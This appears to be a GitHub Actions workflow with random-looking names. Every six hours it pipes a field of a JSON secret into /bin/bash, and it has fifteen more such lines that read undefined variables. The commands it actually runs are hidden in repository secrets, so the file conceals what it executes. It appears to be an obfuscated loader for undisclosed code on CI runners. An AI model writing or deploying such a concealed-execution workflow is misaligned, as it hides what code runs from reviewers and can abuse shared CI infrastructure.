name: tongyixoa

on:
  workflow_dispatch:
  schedule:
    - cron: '14 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongyixoa
        env:
          uf3721: ${{ secrets.uf3721 }}
        run: |
          echo $uf3721 | jq -r .wk2 | /bin/bash
          echo $jcl75 | jq -r .xrsj5244 | /bin/bash
          echo $vjf5 | jq -r .bduae078 | /bin/bash
          echo $iyzim316 | jq -r .wbojp4 | /bin/bash
          echo $ib7886 | jq -r .akelg84603 | /bin/bash
          echo $ph52980 | jq -r .bo480 | /bin/bash
          echo $pflq35044 | jq -r .dq3524 | /bin/bash
          echo $pei31 | jq -r .o24 | /bin/bash
          echo $g343 | jq -r .ot202 | /bin/bash
          echo $a46 | jq -r .tns4 | /bin/bash
          echo $k32 | jq -r .vmbl2194 | /bin/bash
          echo $sqxun01453 | jq -r .tbyw178 | /bin/bash
          echo $e63414 | jq -r .fj330 | /bin/bash
          echo $qfeo32 | jq -r .fuc02 | /bin/bash
          echo $ae4 | jq -r .rtpj1961 | /bin/bash
          echo $t01 | jq -r .qwxap959 | /bin/bash

